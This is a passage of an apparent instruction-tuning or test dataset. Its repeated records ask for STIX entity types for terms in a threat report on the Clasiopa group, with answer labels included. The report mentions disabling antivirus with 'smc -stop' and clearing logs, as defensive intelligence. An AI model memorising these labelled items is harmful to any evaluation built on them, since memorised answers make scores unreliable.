unclear if this was a coincidence or not. However, both the Domino and Agile software appear to be using old certificates and the Agile servers use old vulnerable libraries.\n",
"output": "THREAT_ACTOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nThumb.db\n\n---\n\n### Text Passage:\nClasiopa Tactics, Techniques, and Procedures\nThe infection vector used by Clasiopa is unknown, although there is some evidence to suggest that the attackers gain access through brute force attacks on public facing servers.\nAside from the distinct toolset used, there were a number of attack hallmarks observed:\n* The attackers checked the IP addresses of the computers they were on using: https://ifconfig.me/ip\n* An attempt was made to disable Symantec Endpoint Protection (SEP) by stopping the SepMasterService. The result of this query was checked and then a second attempt was made to disable SEP using \"smc -stop\". Note that any commands attempting to stop SEP will only work if the attacker has administrative credentials and the SEP administrator has disabled anti-tamper protection.\n* The attackers used multiple backdoors to build lists of file names and exfiltrate them. These lists were exfiltrated either in a Thumb.db file or a Zip archive.\n* Sysmon logs were cleared using wsmprovhost.\n* All eventlogs were cleared using PowerShell.\n* A scheduled task named \"network service\" was created to list file names.\nThere is some evidence to suggest that the attackers used two legitimate software packages. One compromised computer was running Agile DGS and Agile FD servers, software developed by Jiangsu. These packages are used for document security and protection in transit. Malicious files were dropped into a folder named \u201cdgs\u201d and one of the backdoors used was renamed from atharvan.exe to agile_update.exe. It is unclear if these software packages are being injected into or installed by the attackers.\nHCL Domino (formerly IBM Domino) was also run on a compromised machine in close proximity to the execution of backdoors, although it is unclear if this was a coincidence or not. However, both the Domino and Agile software appear to be using old certificates and the Agile servers use old vulnerable libraries.\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nhttps://ifconfig.me/ip\n\n---\n\n### Text Passage:\nClasiopa Tactics, Techniques, and Procedures\nThe infection vector used by Clasiopa is unknown, although there is some evidence to suggest that the attackers gain access through brute force attacks on public facing servers.\nAside from the distinct toolset used, there were a number of attack hallmarks observed:\n* The attackers checked the IP addresses of the computers they were on using: https://ifconfig.me/ip\n* An attempt was made to disable Symantec Endpoint Protection (SEP) by stopping the SepMasterService. The result of this query was checked and then a second attempt was made to disable SEP using \"smc -stop\". Note that any commands attempting to stop SEP will only work if the attacker has administrative credentials and the SEP administrator has disabled anti-tamper protection.\n* The attackers used multiple backdoors to build lists of file names and exfiltrate them. These lists were exfiltrated either in a Thumb.db file or a Zip archive.\n* Sysmon logs were cleared using wsmprovhost.\n* All eventlogs were cleared using PowerShell.\n* A scheduled task named \"network service\" was created to list file names.\nThere is some evidence to suggest that the attackers used two legitimate software packages. One compromised computer was running Agile DGS and Agile FD servers, software developed by Jiangsu. These packages are used for document security and protection in transit. Malicious files were dropped into a folder named \u201cdgs\u201d and one of the backdoors used was renamed from atharvan.exe to agile_update.exe. It is unclear if these software packages are being injected into or installed by the attackers.\nHCL Domino (formerly IBM Domino) was also run on a compromised machine in close proximity to the execution of backdoors, although it is unclear if this was a coincidence or not. However, both the Domino and Agile software appear to be using old certificates and the Agile servers use old vulnerable libraries.\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nifconfig.me\n\n---\n\n### Text Passage:\nClasiopa Tactics, Techniques, and Procedures\nThe infection vector used by Clasiopa is unknown, although there is some evidence to suggest that the attackers gain access through brute force attacks on public facing servers.\nAside from the distinct toolset used, there were a number of attack hallmarks observed:\n* The attackers checked the IP addresses of the computers they were on using: https://ifconfig.me/ip\n* An attempt was made to disable Symantec Endpoint Protection (SEP) by stopping the SepMasterService. The result of this query was checked and then a second attempt was made to disable SEP using \"smc -stop\". Note that any commands attempting to stop SEP will only work if the attacker has administrative credentials and the SEP administrator has disabled anti-tamper protection.\n* The attackers used multiple backdoors to build lists of file names and exfiltrate them. These lists were exfiltrated either in a Thumb.db file or a Zip archive.\n* Sysmon logs were cleared using wsmprovhost.\n* All eventlogs were cleared using PowerShell.\n* A scheduled task named \"network service\" was created to list file names.\nThere is some evidence to suggest that the attackers used two legitimate software packages. One compromised computer was running Agile DGS and Agile FD servers, software developed by Jiangsu. These packages are used for document security and protection in transit. Malicious files were dropped into a folder named \u201cdgs\u201d and one of the backdoors used was renamed from atharvan.exe to agile_update.exe. It is unclear if these software packages are being injected into or installed by the attackers.\nHCL Domino (formerly IBM Domino) was also run on a compromised machine in close proximity to the execution of backdoors, although it is unclear if this was a coincidence or not. However, both the Domino and Agile software appear to be using old certificates and the Agile servers use old vulnerable libraries.\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nAgile FD\n\n---\n\n### Text Passage:\nClasiopa Tactics, Techniques, and Procedures\nThe infection vector used by Clasiopa is unknown, although there is some evidence to suggest that the attackers gain access through brute force attacks on public facing servers.\nAside from the distinct toolset used, there were a number of attack hallmarks observed:\n* The attackers checked the IP addresses of the computers they were on using: https://ifconfig.me/ip\n* An attempt was made to disable Symantec Endpoint Protection (SEP) by stopping the SepMasterService. The result of this query was checked and then a second attempt was made to disable SEP using \"smc -stop\". Note that any commands attempting to stop SEP will only work if the attacker has administrative credentials and the SEP administrator has disabled anti-tamper protection.\n* The attackers used multiple backdoors to build lists of file names and exfiltrate them. These lists were exfiltrated either in a Thumb.db file or a Zip archive.\n* Sysmon logs were cleared using wsmprovhost.\n* All eventlogs were cleared using PowerShell.\n* A scheduled task named \"network service\" was created to list file names.\nThere is some evidence to suggest that the attackers used two legitimate software packages. One compromised computer was running Agile DGS and Agile FD servers, software developed by Jiangsu. These packages are used for document security and protection in transit. Malicious files were dropped into a folder named \u201cdgs\u201d and one of the backdoors used was renamed from atharvan.exe to agile_update.exe. It is unclear if these software packages are being injected into or installed by the attackers.\nHCL Domino (formerly IBM Domino) was also run on a compromised machine in close proximity to the execution of backdoors, although it is unclear if this was a coincidence or not. However, both the Domino and Agile software appear to be using old certificates and the Agile servers use old vulnerable libraries.\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\natharvan.exe\n\n---\n\n### Text Passage:\nClasiopa Tactics, Techniques, and Procedures\nThe infection vector used by Clasiopa is unknown, although there is some evidence to suggest that the attackers gain access through brute force attacks on public facing servers.\nAside from the distinct toolset used, there were a number of attack hallmarks observed:\n* The attackers checked the IP addresses of the computers they were on using: https://ifconfig.me/ip\n* An attempt was made to disable Symantec Endpoint Protection (SEP) by stopping the SepMasterService. The result of this query was checked and then a second attempt was made to disable SEP using \"smc -stop\". Note that any commands attempting to stop SEP will only work if the attacker has administrative credentials and the SEP administrator has disabled anti-tamper protection.\n* The attackers used multiple backdoors to build lists of file names and exfiltrate them. These lists were exfiltrated either in a Thumb.db file or a Zip archive.\n* Sysmon logs were cleared using wsmprovhost.\n* All eventlogs were cleared using PowerShell.\n* A scheduled task named \"network service\" was created to list file names.\nThere is some evidence to suggest that the attackers used two legitimate software packages. One compromised computer was running Agile DGS and Agile FD servers, software developed by Jiangsu. These packages are used for document security and protection in transit. Malicious files were dropped into a folder named \u201cdgs\u201d and one of the backdoors used was renamed from atharvan.exe to agile_update.exe. It is unclear if these software packages are being injected into or installed by the attackers.\nHCL Domino (formerly IBM Domino) was also run on a compromised machine in close proximity to the execution of backdoors, although it is unclear if this was a coincidence or not. However, both the Domino and Agile software appear to be using old certificates and the Agile servers use old vulnerable libraries.\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nSysmon\n\n---\n\n### Text Passage:\nClasiopa Tactics, Techniques, and Procedures\nThe infection vector used by Clasiopa is unknown, although there is some evidence to suggest that the attackers gain access through brute force attacks on public facing servers.\nAside from the distinct toolset used, there were a number of attack hallmarks observed:\n* The attackers checked the IP addresses of the computers they were on using: https://ifconfig.me/ip\n* An attempt was made to disable Symantec Endpoint Protection (SEP) by stopping the SepMasterService. The result of this query was checked and then a second attempt was made to disable SEP using \"smc -stop\". Note that any commands attempting to stop SEP will only work if the attacker has administrative credentials and the SEP administrator has disabled anti-tamper protection.\n* The attackers used multiple backdoors to build lists of file names and exfiltrate them. These lists were exfiltrated either in a Thumb.db file or a Zip archive.\n* Sysmon logs were cleared using wsmprovhost.\n* All eventlogs were cleared using PowerShell.\n* A scheduled task named \"network service\" was created to list file names.\nThere is some evidence to suggest that the attackers used two legitimate software packages. One compromised computer was running Agile DGS and Agile FD servers, software developed by Jiangsu. These packages are used for document security and protection in transit. Malicious files were dropped into a folder named \u201cdgs\u201d and one of the backdoors used was renamed from atharvan.exe to agile_update.exe. It is unclear if these software packages are being injected into or installed by the attackers.\nHCL Domino (formerly IBM Domino) was also run on a compromised machine in close proximity to the execution of backdoors, although it is unclear if this was a coincidence or not. However, both the Domino and Agile software appear to be using old certificates and the Agile servers use old vulnerable libraries.\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nAgile DGS\n\n---\n\n### Text Passage:\nClasiopa Tactics, Techniques, and Procedures\nThe infection vector used by Clasiopa is unknown, although there is some evidence to suggest that the attackers gain access through brute force attacks on public facing servers.\nAside from the distinct toolset used, there were a number of attack hallmarks observed:\n* The attackers checked the IP addresses of the computers they were on using: https://ifconfig.me/ip\n* An attempt was made to disable Symantec Endpoint Protection (SEP) by stopping the SepMasterService. The result of this query was checked and then a second attempt was made to disable SEP using \"smc -stop\". Note that any commands attempting to stop SEP will only work if the attacker has administrative credentials and the SEP administrator has disabled anti-tamper protection.\n* The attackers used multiple backdoors to build lists of file names and exfiltrate them. These lists were exfiltrated either in a Thumb.db file or a Zip archive.\n* Sysmon logs were cleared using wsmprovhost.\n* All eventlogs were cleared using PowerShell.\n* A scheduled task named \"network service\" was created to list file names.\nThere is some evidence to suggest that the attackers used two legitimate software packages. One compromised computer was running Agile DGS and Agile FD servers, software developed by Jiangsu. These packages are used for document security and protection in transit. Malicious files were dropped into a folder named \u201cdgs\u201d and one of the backdoors used was renamed from atharvan.exe to agile_update.exe. It is unclear if these software packages are being injected into or installed by the attackers.\nHCL Domino (formerly IBM Domino) was also run on a compromised machine in close proximity to the execution of backdoors, although it is unclear if this was a coincidence or not. However, both the Domino and Agile software appear to be using old certificates and the Agile servers use old vulnerable libraries.\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nSymantec Endpoint Protection\n\n---\n\n### Text Passage:\nClasiopa Tactics, Techniques, and Procedures\nThe infection vector used by Clasiopa is unknown, although there is some evidence to suggest that the attackers gain access through brute force attacks on public facing servers.\nAside from the distinct toolset used, there were a number of attack hallmarks observed:\n* The attackers checked the IP addresses of the computers they were on using: https://ifconfig.me/ip\n* An attempt was made to disable Symantec Endpoint Protection (SEP) by stopping the SepMasterService. The result of this query was checked and then a second attempt was made to disable SEP using \"smc -stop\". Note that any commands attempting to stop SEP will only work if the attacker has administrative credentials and the SEP administrator has disabled anti-tamper protection.\n* The attackers used multiple backdoors to build lists of file names and exfiltrate them. These lists were exfiltrated either in a Thumb.db file or a Zip archive.\n* Sysmon logs were cleared using wsmprovhost.\n* All eventlogs were cleared using PowerShell.\n* A scheduled task named \"network service\" was created to list file names.\nThere is some evidence to suggest that the attackers used two legitimate software packages. One compromised computer was running Agile DGS and Agile FD servers, software developed by Jiangsu. These packages are used for document security and protection in transit. Malicious files were dropped into a folder named \u201cdgs\u201d and one of the backdoors used was renamed from atharvan.exe to agile_update.exe. It is unclear if these software packages are being injected into or installed by the attackers.\nHCL Domino (formerly IBM Domino) was also run on a compromised machine in close proximity to the execution of backdoors, although it is unclear if this was a coincidence or not. However, both the Domino and Agile software appear to be using old certificates and the Agile servers use old vulnerable libraries.\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nwsmprovhost\n\n---\n\n### Text Passage:\nClasiopa Tactics, Techniques, and Procedures\nThe infection vector used by Clasiopa is unknown, although there is some evidence to suggest that the attackers gain access through brute force attacks on public facing servers.\nAside from the distinct toolset used, there were a number of attack hallmarks observed:\n* The attackers checked the IP addresses of the computers they were on using: https://ifconfig.me/ip\n* An attempt was made to disable Symantec Endpoint Protection (SEP) by stopping the SepMasterService. The result of this query was checked and then a second attempt was made to disable SEP using \"smc -stop\". Note that any commands attempting to stop SEP will only work if the attacker has administrative credentials and the SEP administrator has disabled anti-tamper protection.\n* The attackers used multiple backdoors to build lists of file names and exfiltrate them. These lists were exfiltrated either in a Thumb.db file or a Zip archive.\n* Sysmon logs were cleared using wsmprovhost.\n* All eventlogs were cleared using PowerShell.\n* A scheduled task named \"network service\" was created to list file names.\nThere is some evidence to suggest that the attackers used two legitimate software packages. One compromised computer was running Agile DGS and Agile FD servers, software developed by Jiangsu. These packages are used for document security and protection in transit. Malicious files were dropped into a folder named \u201cdgs\u201d and one of the backdoors used was renamed from atharvan.exe to agile_update.exe. It is unclear if these software packages are being injected into or installed by the attackers.\nHCL Domino (formerly IBM Domino) was also run on a compromised machine in close proximity to the execution of backdoors, although it is unclear if this was a coincidence or not. However, both the Domino and Agile software appear to be using old certificates and the Agile servers use old vulnerable libraries.\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
